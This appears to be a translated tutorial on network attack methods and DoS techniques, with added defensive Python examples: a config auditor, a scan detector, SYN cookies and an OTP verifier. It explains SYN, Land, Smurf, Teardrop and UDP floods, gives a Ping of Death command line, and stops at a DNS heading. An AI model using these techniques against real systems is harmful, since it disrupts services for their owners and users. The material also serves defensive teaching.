GAME OVER GROUP
Contents

Part I: Overview of network attacks
  I. Understanding network attacks
  II. Threats to network security
  III. Attacking a computer network
  IV. Forms of attack
  V. Some network attack techniques
Part II: DoS attacks
  I. What is a DoS attack? 1. Purpose of DoS attacks. 2. Targets
  II. Known and currently used DoS attack types
  III. Some DoS countermeasures
Part III: DDoS
  I. The DDoS (Distributed Denial of Service) concept
  II. Phases of a DDoS attack
  III. Overall architecture of a DDoS attack-network
  IV. Classification of DDoS attacks
  V. Some characteristics of DDoS attack tools
  VI. Some DDoS tools
  VII. Anti-DDoS techniques
Part IV: ... DoS and DDoS
Part I: Overview of network attacks

I. Understanding network attacks
A network attack can be defined as any method, process or means used maliciously in an attempt to compromise network security. There are several reasons why an individual (or individuals) might want to attack an enterprise network. Individuals who carry out network attacks are commonly called network attackers, hackers or crackers. A few of the different kinds of malicious activity that network attackers and hackers carry out are summarized here:
- Unauthorized use of user accounts and privileges
- Theft of hardware
- Theft of software
- Running code to damage systems
- Running code to damage and corrupt data
- Modifying stored data
- Theft of data
- Using data for financial gain or for industrial espionage
- Taking actions that prevent legitimate, authorized users from accessing network services and resources
- Taking actions that exhaust network resources and bandwidth

II. Threats to network security

1. "Insiders"
In a number of small and medium businesses, critical business data or customer information is entrusted to a single individual. This creates a dangerous state of "dependence on one person's authority". Network system logs and automated reports are not reviewed regularly by management, so data leakage can go on for a long time without being detected.

2. No risk-handling plan
A business's computer systems and network constantly face many security risks; everything from accidental hardware failure to attacks by hackers or viruses can damage data. Quite a few small and medium businesses lack any response policy for data leakage or any incident recovery plan; most are caught off guard and fall back on improvised, reactive measures.

3. Default settings that were never changed
Hackers today commonly use files containing hundreds of thousands of default accounts (username and password) for network-connected devices in order to find credentials that log in to the network. If default accounts and settings are not changed, a hacker will easily take control of network resources.

4. Insecure home network environments
In some small businesses, employees bring their own laptops to the office. In a home network the security regime is usually very weak, or there are no protective settings at all. The employees' laptops can therefore be the source that spreads viruses and malware, or become intermediate zombies that hackers use to attack the company network.

5. Carelessness with public networks
A common trick hackers use to lure victims is to set up a wireless access point without a password (unsecured), label it "Free Wi-Fi", and sit back and wait for naive connections to fall into the trap. With packet capture tools the hacker can read any text, or anything else, that company employees type and send out.

6. Lost mobile devices
Many businesses, including recently a few large companies, have leaked important data through stolen laptops, lost mobile phones or USB flash drives. Data on these devices is rarely encrypted or password-protected and is easy to use once someone gets hold of them.

7. Web server flaws
Quite a few businesses still pay no attention to which server their website is hosted on or how well it is secured. The company's business website is then easy prey for SQL injection attacks or botnets.

8. Indiscriminate web browsing
Not every office employee understands the dangers lurking on the Internet, such as malware, spyware, viruses and trojans. They casually visit unknown websites or are lured into clicking on websites a hacker has booby-trapped, and the employee's computer becomes the doorway through which the hacker enters the company network.

9. Email carrying malicious code
Floods of spam fill your mailbox with tempting subjects such as celebrity scandals, hot pictures or business offers; a single wrong click and the computer immediately downloads malicious code that opens the way for a string of further malware to enter the machine.

10. Unpatched security flaws
More than 90% of attacks on network systems try to exploit already-known security flaws. Although vendors regularly provide patches right after a flaw is discovered, some businesses do not take regular updating seriously, leaving those flaws wide open to attack.

11. Some other threats
+ A zero-day flaw in Adobe software (Flash Player, Adobe Reader and Acrobat). This flaw was newly discovered in March 2011 and rated critical. It lets an attacker execute code and potentially take control of the system. Cybercriminals embed the malicious code as a Flash file (.swf) inside PDF or Excel documents.
+ The Conficker worm appeared quite early in Vietnam and has had many successive variants, becoming ever more dangerous. Millions of computers worldwide are estimated to be infected with Conficker and have unwittingly become a botnet that hackers use to mount large-scale DDoS attacks.
+ A malware family is currently circulating which, once it infects a computer, takes control of the system and displays fake notifications. It targets computers running unlicensed Windows and offers to "activate" the service. Many consumers have lost money calling a phone number (chosen by the hacker) to obtain a Windows activation code.

12. Security weaknesses
Understanding security weaknesses is essential before putting effective security policies in place; it lets you secure the network before hackers attack it. Cisco identifies three classes of security weakness: technology weaknesses, configuration weaknesses and policy weaknesses.

12.1) Technology weaknesses
Technical weaknesses include weaknesses in protocols, operating systems and hardware.

a) TCP/IP weaknesses: The TCP/IP protocol suite is a security weakness because it was designed as an open standard to make information exchange easy. That is what makes it so widely used, but it also makes it easy to attack, since almost everyone is familiar with how TCP/IP works. Two protocols in the TCP/IP suite that Cisco likes to single out as useful but inherently insecure are SMTP (TCP) and SNMP (UDP). Typical attacks on these two protocols are IP spoofing, man-in-the-middle and session replay.

b) Operating system weaknesses: All operating systems have weaknesses, but Linux and Unix are considered to have fewer than Windows. In practice, most people use some version of Windows.

c) Network equipment weaknesses: Most network devices such as servers, switches and routers have security weaknesses. A good policy for configuring and installing network equipment greatly reduces the impact of these weaknesses.

12.2) Configuration weaknesses
These are mistakes made by the administrator. They arise from configuration shortcomings such as unsecured user accounts, system accounts with easily guessed passwords, unsecured default settings on devices, or errors in device configuration.

a) Unsecured user accounts: Every user account needs a username and password for security. These usernames and passwords are often transmitted in clear text over the network, so a policy for securing user accounts, such as encryption and authentication, is needed.

b) System accounts with easily guessed passwords: Another configuration weakness is protecting accounts with passwords that are easily stolen. To prevent this, the administrator needs a policy that does not allow a password to remain valid forever: every password must have an expiry date.

c) Misconfigured Internet services: Some companies use real Internet addresses as the addresses of their hosts and servers. This creates a weakness that hackers easily exploit to gather information. Using NAT or PAT solves the problem: private addresses let hosts and servers be addressed without using public Internet addresses, while the public address is routed out to the Internet by the border router. That alone is not the optimal measure, though: the port on the interface connecting to the Internet must be open to let users out to the Internet and vice versa, and that is a hole in the firewall that a hacker can attack through. Security can be provided for the network by using conduits, which are basic secured connections. The Cisco Secure Private Internet Exchange (PIX) firewall is the optimal measure for providing good security for the network.

d) Unsecured default settings in products: Many hardware products ship without a password, or with a ready-made password, so that administrators can configure the device easily. This makes the job easier, since some devices only need to be plugged in to work, but it also makes attacking the network easy. A secure configuration policy must therefore be applied to every device before it is installed in the network.

e) Misconfigured network equipment: Device misconfiguration is a hole that can be exploited to attack the network: weak passwords, no security policy, or unsecured user accounts are all device configuration errors. The hardware and the protocols running on a device also create security holes in the network. If you have no security policy for this hardware and these protocols, a hacker will exploit them to attack the network. If you run SNMP with its default settings, information can be stolen easily and quickly, so make sure you either disable SNMP or change its default settings.

12.3) Policy weaknesses
The security policy describes how and where security is to be enforced; it is the essential condition for security to work well. Policy weaknesses include: absence of a written security policy, organizational politics, lack of business continuity, lax security administration, installations and changes that do not follow the stated policy, and no disaster recovery plan.
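The configuration weaknesses listed in 12.2 (default credentials, clear-text passwords, default SNMP community strings, unencrypted management access) can be checked mechanically. The following is an added example, not code from the original document: it audits a constructed IOS-style configuration text. The sample configuration, the list of vendor default credentials and the exact finding messages are all assumptions made for this example.

```python
import re

# Constructed sample of an IOS-style device configuration; it is not taken from any real device.
SAMPLE_CONFIG = """\
hostname edge-router
enable password letmein
username admin password 0 admin
username ops secret 5 $1$abcd$xyz
snmp-server community public RO
snmp-server community s3cr3t-r0 RO
line vty 0 4
 transport input telnet
 login local
"""

# Assumed (constructed) vendor-default credential pairs of the kind found in attacker wordlists.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("cisco", "cisco"), ("root", "root")}
DEFAULT_COMMUNITIES = {"public", "private"}


def audit_config(config):
    """Return a list of findings for the weak settings discussed in this section."""
    findings = []
    lines = [ln.rstrip() for ln in config.splitlines()]

    # Without this, type-0 passwords are stored in clear text and leak with every config backup.
    if "service password-encryption" not in lines:
        findings.append("service password-encryption is off: type-0 passwords stay in clear text")

    for ln in lines:
        if re.match(r"enable password\s+\S+", ln):
            findings.append("enable password is clear text: use 'enable secret' (hashed) instead")
        if m := re.match(r"username (\S+) password 0 (\S+)", ln):
            user, pw = m.groups()
            findings.append(f"user {user!r}: clear-text (type 0) password")
            if (user, pw) in DEFAULT_CREDENTIALS:
                findings.append(f"user {user!r}: vendor default username/password, change it before deployment")
        if m := re.match(r"snmp-server community (\S+)", ln):
            if m.group(1).lower() in DEFAULT_COMMUNITIES:
                findings.append(f"SNMP community {m.group(1)!r} is a default string: change it or disable SNMP")

    # The vty block is the remote management path; Telnet sends the login in clear text.
    vty = re.search(r"^line vty.*\n((?:[ \t].*\n?)*)", config, re.M)
    if vty:
        transport = re.search(r"transport input (.+)", vty.group(1))
        if transport is None:
            findings.append("vty lines have no 'transport input' restriction: set 'transport input ssh'")
        elif {"telnet", "all"} & set(transport.group(1).split()):
            findings.append("vty lines accept Telnet (clear-text management): set 'transport input ssh'")
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("-", finding)
```

Run against the sample, the audit reports six findings: the missing password-encryption service, the clear-text enable password, the `admin`/`admin` account (both clear text and a default pair), the `public` community string, and Telnet on the vty lines. The `s3cr3t-r0` community and the hashed `ops` secret are not flagged.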
III. Attacking a computer network
1. Gathering information about the system
Information gathering can be divided into two types:
+ Passive reconnaissance: seamoun calls this, in plain words, "riding past on horseback and looking at the flowers". This kind of gathering is a preliminary survey of the organization: general information, geographic location, telephone numbers and email addresses of individuals and managers in the organization, and so on. You may ask why anyone would bother collecting the phone numbers and email addresses of people in the organization. They are very useful when carrying out a social engineering attack (seamoun will come back to this later).
+ Active reconnaissance: this collects information that touches the system more directly, such as the IP address range, domain and DNS.
Note: all of this information gathering is very important to the hacker, because it helps identify the paths by which the system is easiest to attack. It is like courting a girl: going straight at her gets you nowhere. You first have to find out where she lives, how many siblings she has, what her parents are like, and learn her tastes through her close friends... (if any of that is wrong, it is a remark for the southerners, who are surely better at this than seamoun).
The information gathering process can be described in 7 steps (the division is only approximate):
1: Gather initial information
2: Determine the network range
3: Check which machines are "alive"
4: Discover open ports
5: Identify the operating system
6: Enumerate the services behind the open ports found
7: Build a network map

2. Scanning
Scanning, also called network scanning, is an indispensable step in a hacker's attack on a network. Done well, it quickly reveals flaws in the system, for example the Windows RPC flaw or flaws in web service software such as Apache. From these flaws the hacker can use malicious code (obtained from websites) to attack the system and, at the very least, get a shell. There are many kinds of scanning software, including commercial products such as Retina and GFI and free ones such as Nmap and Nessus. The commercial versions can usually update their bug databases from the Internet and so detect newer flaws. Scanning software can also help an administrator find flaws in the system and propose fixes such as applying service packs or using more appropriate policies.
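Steps 3 and 4 above (finding live hosts, then open ports) leave a characteristic trace on a firewall: one source touching many hosts with ICMP, then many ports on one host, within a short window. The following is an added example, not code from the original document, of the defender's side of this: a detector run over constructed firewall log lines. The log format, the thresholds and the sample addresses are assumptions made for this example, not any real product's format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log line format (constructed): "<iso-timestamp> <ACTION> <PROTO> <src>[:sport] -> <dst>[:dport]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) (?P<proto>ICMP|TCP|UDP) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?::(?P<sport>\d+))? -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?::(?P<dport>\d+))?$"
)


def parse(line):
    """Return a dict for one log line, or None if the line does not match the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def _distinct_in_window(events, window):
    """Largest number of distinct values seen inside any sliding time window of the given length."""
    events.sort()
    best, lo = 0, 0
    for hi in range(len(events)):
        while events[hi][0] - events[lo][0] > window:
            lo += 1
        best = max(best, len({v for _, v in events[lo:hi + 1]}))
    return best


def detect_recon(lines, window=timedelta(seconds=60), sweep_hosts=8, scan_ports=10):
    """Map each suspicious source address to the set of reconnaissance alerts raised for it."""
    icmp_targets = defaultdict(list)   # src -> [(ts, dst)]          for ping sweeps
    port_hits = defaultdict(list)      # (src, dst) -> [(ts, dport)] for port scans
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        if ev["proto"] == "ICMP":
            icmp_targets[ev["src"]].append((ev["ts"], ev["dst"]))
        elif ev["dport"]:
            port_hits[(ev["src"], ev["dst"])].append((ev["ts"], int(ev["dport"])))

    alerts = defaultdict(set)
    for src, events in icmp_targets.items():
        if _distinct_in_window(events, window) >= sweep_hosts:
            alerts[src].add("ping sweep")
    for (src, dst), events in port_hits.items():
        if _distinct_in_window(events, window) >= scan_ports:
            alerts[src].add(f"port scan of {dst}")
    return dict(alerts)


def _t(seconds):
    return (datetime(2024, 3, 1, 10, 0, 0) + timedelta(seconds=seconds)).isoformat()


# Constructed sample log: one scanner, one slow/benign ICMP source, one normal HTTPS client.
SAMPLE_LOG = (
    [f"{_t(i)} DENY ICMP 203.0.113.5 -> 192.0.2.{10 + i}" for i in range(12)]                     # sweep of 12 hosts
    + [f"{_t(20 + i)} DENY TCP 203.0.113.5:4{i:04d} -> 192.0.2.10:{20 + i}" for i in range(15)]    # 15 ports in 15 s
    + [f"{_t(i * 600)} ALLOW ICMP 198.51.100.7 -> 192.0.2.{10 + i}" for i in range(12)]            # one ping per 10 min
    + [f"{_t(i)} ALLOW TCP 198.51.100.9:51000 -> 192.0.2.10:443" for i in range(30)]               # ordinary client
)

if __name__ == "__main__":
    for src, what in detect_recon(SAMPLE_LOG).items():
        print(src, sorted(what))
```

Only 203.0.113.5 is reported, with both a ping sweep and a port scan of 192.0.2.10; the host that pings twelve machines ten minutes apart never reaches the threshold inside one window, which is why the sliding window rather than a plain counter is used.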
IV. Forms of attack

1. Network disruption based on the limited or non-renewable nature of resources
1) Through connections:
1.1: SYN flood attack: Exploiting the way a TCP/IP connection is established, the hacker begins setting up a TCP/IP connection with the intended target but abandons it right after the SYN and SYN-ACK steps complete, leaving the target waiting (for the ACK from the side that requested the connection) and repeatedly resending SYN-ACK to complete the connection. Another variant spoofs the source IP address of the SYN connection request; as in the previous case, the target host falls into a waiting state and its SYN-ACK packets never reach their destination, because the source IP address does not exist. Hackers can use this technique to attack a network whose bandwidth is larger than their own.

2) Exploiting the victim's own resources to attack it:
2.1: Land attack: Similar to a SYN flood, but the hacker uses the target's own IP address as the source IP address of the packet, pushing the target into an endless loop as it tries to establish a connection with itself.
2.2: UDP flood attack: The hacker sends UDP echo packets whose source IP address is the target's loopback address, or the address of a machine in the same network as the target, to the target's UDP echo port (port 7). This sets up an exchange of echo packets between the two machines (or between the target and itself, if the target has its loopback port configured), so that the two machines gradually consume all of their bandwidth and hamper resource sharing by the other machines on the network.

3) Using bandwidth:
3.1: DDoS (Distributed Denial of Service) attack: This is a very dangerous form of attack. The hacker breaks into many computer systems, installs remote control programs on them and triggers all of them at the same moment to attack a single target simultaneously. This method can mobilize hundreds or even thousands of computers to attack at once (depending on the hacker's preparation) and can swallow the target's entire bandwidth in an instant.
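The SYN flood in 1.1 works because the server stores state for every half-open connection. The following is an added example, not code from the original document, that models both sides: a listener with a fixed half-open backlog, and the same listener using SYN cookies, where the server ISN in the SYN-ACK is a keyed function of the connection 4-tuple and a coarse time counter, so no state is kept until the final ACK proves the client address is real. The cookie layout (5-bit time counter, 3-bit MSS index, 24-bit keyed hash, the classic SYN-cookie construction), the MSS table, the backlog size and the addresses are assumptions made for this example.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass, field

# MSS values the cookie's 3-bit field can encode (chosen for this example).
MSS_TABLE = (536, 1220, 1460, 4460)


def _cookie_hash(secret, src, sport, dst, dport, t5):
    """24-bit keyed hash of the connection 4-tuple and the 5-bit time counter."""
    msg = struct.pack("!4sH4sHI", src, sport, dst, dport, t5)
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(secret, src, sport, dst, dport, client_isn, mss, t):
    """Server ISN for the SYN-ACK: top 5 bits time counter, next 3 MSS index, low 24 hash + client ISN."""
    idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    t5 = t & 0x1F
    low = (_cookie_hash(secret, src, sport, dst, dport, t5) + client_isn) & 0xFFFFFF
    return (t5 << 27) | (idx << 24) | low


def check_syn_cookie(secret, src, sport, dst, dport, client_isn, cookie, now, max_age=4):
    """Return the encoded MSS if the cookie (the final ACK minus 1) is genuine and recent, else None."""
    t5 = cookie >> 27
    if (now - t5) & 0x1F > max_age:          # stale: a replayed ACK or a very slow client
        return None
    expect = (_cookie_hash(secret, src, sport, dst, dport, t5) + client_isn) & 0xFFFFFF
    if cookie & 0xFFFFFF != expect:
        return None
    return MSS_TABLE[(cookie >> 24) & 0x7]


@dataclass
class Listener:
    secret: bytes
    addr: bytes
    port: int
    backlog: int = 128
    syn_cookies: bool = False
    half_open: dict = field(default_factory=dict)   # (src, sport) -> (client_isn, server_isn)
    established: set = field(default_factory=set)
    dropped: int = 0

    def on_syn(self, src, sport, client_isn, mss, t):
        """Handle a SYN; return the server ISN sent in the SYN-ACK, or None if the SYN is dropped."""
        if self.syn_cookies:
            return make_syn_cookie(self.secret, src, sport, self.addr, self.port, client_isn, mss, t)
        if len(self.half_open) >= self.backlog:   # spoofed SYNs fill the queue and never ACK
            self.dropped += 1
            return None
        server_isn = _cookie_hash(self.secret, src, sport, self.addr, self.port, t & 0x1F)
        self.half_open[(src, sport)] = (client_isn, server_isn)
        return server_isn

    def on_ack(self, src, sport, client_isn, ack, t):
        """Handle the final ACK of the handshake (ack == server_isn + 1)."""
        if self.syn_cookies:
            if check_syn_cookie(self.secret, src, sport, self.addr, self.port, client_isn, ack - 1, t) is None:
                return False
        else:
            entry = self.half_open.pop((src, sport), None)
            if entry is None or entry[1] + 1 != ack:
                return False
        self.established.add((src, sport))
        return True


def demo(syn_cookies):
    """1000 spoofed SYNs, then one honest client; returns (client connected?, SYNs dropped)."""
    srv = Listener(secret=b"rotate-me-periodically", addr=bytes([192, 0, 2, 10]), port=80,
                   syn_cookies=syn_cookies)
    t = 0
    for i in range(1000):                               # forged sources: the SYN-ACKs go nowhere
        srv.on_syn(struct.pack("!I", 0x0A000000 + i), 40000 + i, i, 1460, t)
    src, sport, isn = bytes([198, 51, 100, 7]), 51515, 777
    server_isn = srv.on_syn(src, sport, isn, 1460, t)
    ok = server_isn is not None and srv.on_ack(src, sport, isn, server_isn + 1, t + 1)
    return ok, srv.dropped


if __name__ == "__main__":
    print("stateful backlog:", demo(False))   # (False, 873): honest client refused
    print("SYN cookies:    ", demo(True))     # (True, 0): nothing to fill up
```

With the stateful backlog the first 128 forged SYNs fill the queue and the honest client's SYN is the 873rd drop; with cookies the server stores nothing until a valid ACK arrives, and a cookie replayed more than `max_age` counter ticks later is rejected.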
4) Using other resources:
The attacker exploits resources that the victim needs in order to attack it. Attackers can alter data, or copy data the victim needs many times over, overloading the CPU and delaying data processing.
4.1: Smurf attack: This attack needs one very important component, the amplifier network. The hacker uses the address of the target machine as the source and broadcasts ICMP echo packets to the whole network. All the machines in that network then send ICMP replies to the machine the hacker wants to attack at the same time. As a result that machine cannot process such a large volume of traffic in time and can easily hang.
4.2: Teardrop attack: In a packet-switched network, data is split into many packets, each with its own offset value, and the packets may travel by different paths to the destination. At the destination, the data is reassembled using the offset value of each packet. Exploiting this, the hacker creates many packets with overlapping offset values and sends them to the target. The target machine is then unable to reorder these packets and may hang, having used up all of the system's processing capacity.

2. Destroying or modifying configuration information
Exploiting insecure configuration (for example routers that do not authenticate the routing updates they send and receive), the attacker alters critical information remotely or directly so that legitimate users cannot use the service. For example, a hacker can break into a DNS server and change its records so that the DNS resolution of domain names to IP addresses is wrong; as a result, client requests for one domain end up at a different one.

3. Physical destruction or modification of hardware
The attacker uses their own access to the devices in the network (routers, switches) to reach them and sabotage them.

V. Some network attack techniques
1) Reconnaissance attacks
First the hacker pings the intended target to determine its IP address. Next the hacker determines which ports and services are live on that IP address. From this information the hacker starts to identify the type and version of the operating system. The hacker then proceeds to steal data or destroy the network's operating system. Attacks of this kind include: packet sniffers, port scans, ping sweeps and Internet information queries.

a) Packet sniffers
A packet sniffer is an application that uses a network adapter in promiscuous mode to capture all packets sent across a LAN. The technique only works within a single collision domain. Packet sniffers harvest information transmitted in clear text. Protocols that transmit in clear text include Telnet, FTP, SNMP, POP and HTTP. Because the packets of these protocols are not encrypted, they can be read by anyone using a packet sniffer. The following methods are used to prevent packet sniffing: authentication, switched infrastructure, antisniffer tools and cryptography.

Authentication: This authentication technique is commonly implemented with one-time passwords (OTPs). It combines two factors: a personal identification number (PIN) and a token card, which authenticates a device or an application. A token card is a hardware device or a piece of software that generates random secret information (a password) at a given moment, usually every 60 seconds. The user combines this password with a PIN to create a unique password. Even if a hacker learns the password through packet sniffing, the information is worthless because it has already expired.

Switched infrastructure: This technique can be used to block packet sniffers in the network environment. For example, if the whole network uses Ethernet switches, a hacker can only tap the traffic flowing to the one host the hacker is connected to. The technique does not block packet sniffers completely, but it can limit their reach.

Antisniffer tools: These are software and hardware designed to detect sniffers. They do not completely remove the risk of being sniffed, but like the other tools they are part of the overall system.

Cryptography: Encryption lets data cross the network without being in clear text. Even if a hacker captures the data, the hacker cannot decrypt it. This method is more effective than detecting and blocking sniffers: if a channel is encrypted, whatever a packet sniffer captures is worthless because it is not the original information. Cisco's encryption system is based on IPSec, a tunnel encryption protocol based on IP addresses. Other protocols include Secure Shell (SSH) and Secure Socket Layer (SSL).

b) Port scans and ping sweeps
These techniques are carried out for the following purposes:
- Identify the services in the network
- Identify the hosts and devices operating in the network
- Identify the operating systems in use
- Identify all the weaknesses in the network, and from there pursue other goals.
With ping sweeps, the hacker obtains a list of the hosts that are alive in an environment. The hacker then uses a port scanning tool to cycle through all the ports and produce a full list of the services running on the hosts found by the ping sweep. The hacker's next job is to identify which services have weaknesses and start attacking them. An IDS is used to alert the administrator to reconnaissance attacks such as port scans and ping sweeps; it helps the administrator be well prepared to stop the hacker.

c) Internet information queries
DNS queries can reveal a lot of information, such as who owns a domain and which address range is assigned to it. The hacker uses this tool to reconnoitre the network. Combined with port scans and ping sweeps, once enough information has been found (active ports, the protocols running on those ports), the hacker examines the characteristics of these applications to find weaknesses and begin the attack.

2) Access attacks
In this method the intruder typically attacks the network in order to steal data, gain access, and gain further access privileges later. Access attacks can include:
- Password attack
- Trust exploitation
- Port redirection
- Man-in-the-middle attack

a) Password attack
A hacker can break into a system using brute-force attacks, trojan horses, IP spoofing and packet sniffers. A brute-force attack is usually carried out with a program that runs across the network and tries to break into a shared environment. When the hacker gains access to a resource, the hacker has the same rights as the user who shares it. If the resource is valuable enough, the hacker creates a back door for later access. The hacker can also change the network's routing table, ensuring that all packets are sent to the hacker before being forwarded to their final destination; in some cases the hacker can then monitor all traffic and truly become a man in the middle. Password attacks can be limited in the following ways:
- Do not allow users to use the same password on multiple systems.
- Disable the account after a few failed logins. This check prevents repeated password probing.
- Do not use clear-text passwords: use OTP or encrypt passwords, as presented above.
- Use strong passwords: at least 8 characters, containing uppercase letters, lowercase letters, digits and special characters.

b) Trust exploitation
This method exploits trust; it relies on the trust relationships inside the network. Normally, if two domains trust each other, devices in one domain are allowed to access the other. The hacker takes advantage of loopholes in the trust relationship, exploiting its flaws to compromise, that is take control of, the other side. Systems outside the firewall should have no trust relationship at all with systems inside the firewall.

c) Port redirection
This is another form of trust exploitation attack that uses a compromised host to get permission through the firewall. Imagine a firewall with 3 interfaces, each connected to one host. The outside host can reach the public services host (commonly called the demilitarized zone, DMZ), and the public services host can reach both the host inside and the host outside the firewall. The hacker compromises the public services host and installs software on it that creates a direct traffic path from the outside host to the inside host, a connection that is not made through the firewall. The outside host thus gains a connection to the inside host through port redirection on the intermediate (public services) host.

d) Man-in-the-middle attack
A man-in-the-middle attack is carried out using network packet sniffers and the routing and transport protocols. Its goals are:
- stealing data
- hijacking a session
- analyzing traffic in the network
- DoS
- corrupting transmitted data
One example of a man-in-the-middle attack is someone working for an ISP trying to access all the packets carried between the ISP and any other network. This form of attack can be prevented with encryption: if traffic is encrypted inside an IPSec tunnel, the hacker sees only worthless information.
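The token-plus-PIN scheme described under Authentication (a code that changes every 60 seconds, prefixed by the user's PIN) and the lockout rule from the password-attack countermeasures fit together in one verifier. The following is an added example, not code from the original document: the token code is computed with HMAC-SHA1 dynamic truncation as in HOTP/TOTP (RFC 4226/6238), which is this example's choice of construction, not something the text specifies. The seed, PIN and timestamps are constructed values.

```python
import hashlib
import hmac
import struct

STEP = 60  # the token in the text produces a new value every 60 seconds


def token_code(seed, counter, digits=6):
    """HOTP-style dynamic truncation (RFC 4226) of HMAC-SHA1 over the time-step counter."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (int.from_bytes(mac[off:off + 4], "big") & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"


def one_time_password(seed, pin, now):
    """What the user types: the PIN followed by the token's current code."""
    return pin + token_code(seed, int(now // STEP))


class OtpVerifier:
    """Server side: each time step is accepted once, +/- skew steps of clock drift are tolerated,
    and the account locks after max_failures consecutive failures."""

    def __init__(self, seed, pin, skew=1, max_failures=5):
        self.seed, self.pin, self.skew, self.max_failures = seed, pin, skew, max_failures
        self.used = set()      # counters already redeemed: a sniffed OTP cannot be replayed
        self.failures = 0
        self.locked = False

    def verify(self, otp, now):
        if self.locked:
            return False
        pin, code = otp[:len(self.pin)], otp[len(self.pin):]
        counter = int(now // STEP)
        if hmac.compare_digest(pin, self.pin):
            for cand in range(counter - self.skew, counter + self.skew + 1):
                if cand not in self.used and hmac.compare_digest(code, token_code(self.seed, cand)):
                    self.used.add(cand)
                    self.failures = 0
                    return True
        self.failures += 1
        if self.failures >= self.max_failures:
            self.locked = True   # the "disable the account after a few failed logins" rule
        return False


if __name__ == "__main__":
    SEED, PIN = b"constructed-demo-seed", "4711"   # constructed values, not real secrets
    server = OtpVerifier(SEED, PIN)
    now = 1_700_000_000
    otp = one_time_password(SEED, PIN, now)
    print(otp, server.verify(otp, now))         # True: first use inside the time step
    print(otp, server.verify(otp, now + 5))     # False: replay of the sniffed code
    print(otp, server.verify(otp, now + 300))   # False: the step has expired
```

The point the text makes about sniffing is visible in the second and third calls: the captured OTP is rejected both within its own minute (already redeemed) and afterwards (expired), and the `used` set is what turns "expires after 60 seconds" into "cannot be replayed even within those 60 seconds".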
Part II: DoS attacks

I) What is a DoS attack?
(Denial of Service Attack) A DoS attack (literally, a denial-of-service attack) is a very damaging form of attack: with this kind of attack you only need a single computer connected to the Internet to attack the opponent's computer. In essence, in a DoS attack the hacker takes up a large share of the server's resources (bandwidth, memory, CPU, disk, ...) so that the server can no longer respond to requests from other people's machines (the machines of ordinary users), and the server can quickly stop working, crash or reboot.

1. Purpose of DoS attacks
- Trying to seize the network's bandwidth and flood the network, so that the network can no longer provide its other services to normal users.
- Trying to break the connection between two machines and block access to a service.
- Trying to prevent particular users from reaching a service.
- Trying to stop services so that others cannot access them.
When a DoS attack occurs, users accessing the service experience:
+ Disable Network: the network is down
+ Disable Organization: the organization cannot operate
+ Financial Loss: money is lost

2. Targets that attackers commonly use in DoS attacks
As noted above, a DoS attack occurs when the attacker uses up the system's resources so that it cannot serve normal users; the resources usually attacked are:
- Creating scarcity, limits or non-renewal of resources. Network bandwidth, memory, disk, CPU time and data structures are all targets of DoS attacks.
- Attacking other systems that serve the computer network: air conditioning, power, and many other resources of the business. Just imagine whether users can still reach a web server when its power supply is cut.
- Destroying or changing configuration information.
- Physically destroying infrastructure or network equipment such as the power supply or air conditioning.

II) Known and currently used DoS attack types:
1.) WinNuke
This type of DoS attack only applies to computers running Windows 9x. The hacker sends packets with "Out of Band" data to port 139 of the target computer. (Port 139 is the NetBIOS port, which only accepts packets with the Out of Band flag set.) When the victim's computer receives such a packet, a blue error screen appears, because the Windows program receiving the packets does not know how to react to the Out of Band data and the system crashes.

2.) Ping of Death
In this type of DoS attack, you simply send an oversized packet via the ping command to the target and its system hangs.
Example: ping -l 65000

3.) Teardrop
As we know, all data sent over the network from the source system to the destination goes through 2 processes: the data is split into small fragments at the source, each fragment carrying a certain offset value that determines its position in the transmitted data. When the fragments arrive at the destination, the destination uses the offset values to reassemble them in the original order. Exploiting this, you only need to send the destination a series of packets whose offset values overlap. The destination cannot reassemble these packets, loses control, and may crash, reboot or stop working if the number of packets with overlapping offsets is large enough.

4.) SYN attack
In a SYN attack, the hacker sends the target a series of SYN packets with source IP addresses that do not exist. On receiving them, the target replies to those non-existent addresses and waits for a response from the spoofed addresses. Because the addresses are not real, the target keeps waiting and keeps these pending "requests" in memory, wasting a significant amount of server memory that should be used for other things rather than for waiting on responses that will never come. If many packets with spoofed IP addresses are sent at once, the system is overloaded and crashes or reboots. => Done, and hands to spare.

5.) Land attack
A Land attack is roughly like a SYN attack, but instead of using non-existent IP addresses, the hacker uses the victim system's own IP address. This creates an endless loop inside the victim system itself, where one side waits for a response that the other side never sends. => Flooded and stuck.

6.) Smurf attack
A Smurf attack involves three components: the hacker (who orders the attack), the amplifier network (which obeys the hacker), and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifier network. What is special is that the source IP address of these ICMP packets is the victim's IP address. When the packets reach the broadcast address of the amplifier network, the computers in that network believe the victim sent the ICMP packets and all reply to the victim at once with ICMP reply packets. The victim system cannot handle this huge volume of packets and quickly stops working, crashes or reboots. Thus, with only a small number of ICMP packets sent, the amplifier network multiplies them many times over; the amplification factor depends on the number of machines in the amplifier network. The hacker's task is to take over as many networks or routers as possible that forward packets directly to the broadcast address without filtering the packets' source address. With these systems in hand, the hacker can easily mount Smurf attacks on the systems to be attacked. => One machine against a crowd; when the crowd comes, better give up.

7.) UDP flooding
A UDP attack requires 2 systems to take part. The hacker makes their own system enter a loop exchanging data over the UDP protocol, spoofing the source IP address of the packets as the loopback address (127.0.0.1) and sending the packets to the victim system on the UDP echo port (7). The victim system replies to the messages sent by 127.0.0.1 (itself), so it ends up in an endless loop. However, many systems do not allow the loopback address to be used, so the hacker instead spoofs the IP address of some machine on the victim's network and floods the victim's system with UDP. If this is done wrong, your own machine ends up being the one flooded.

8.) DNS attack
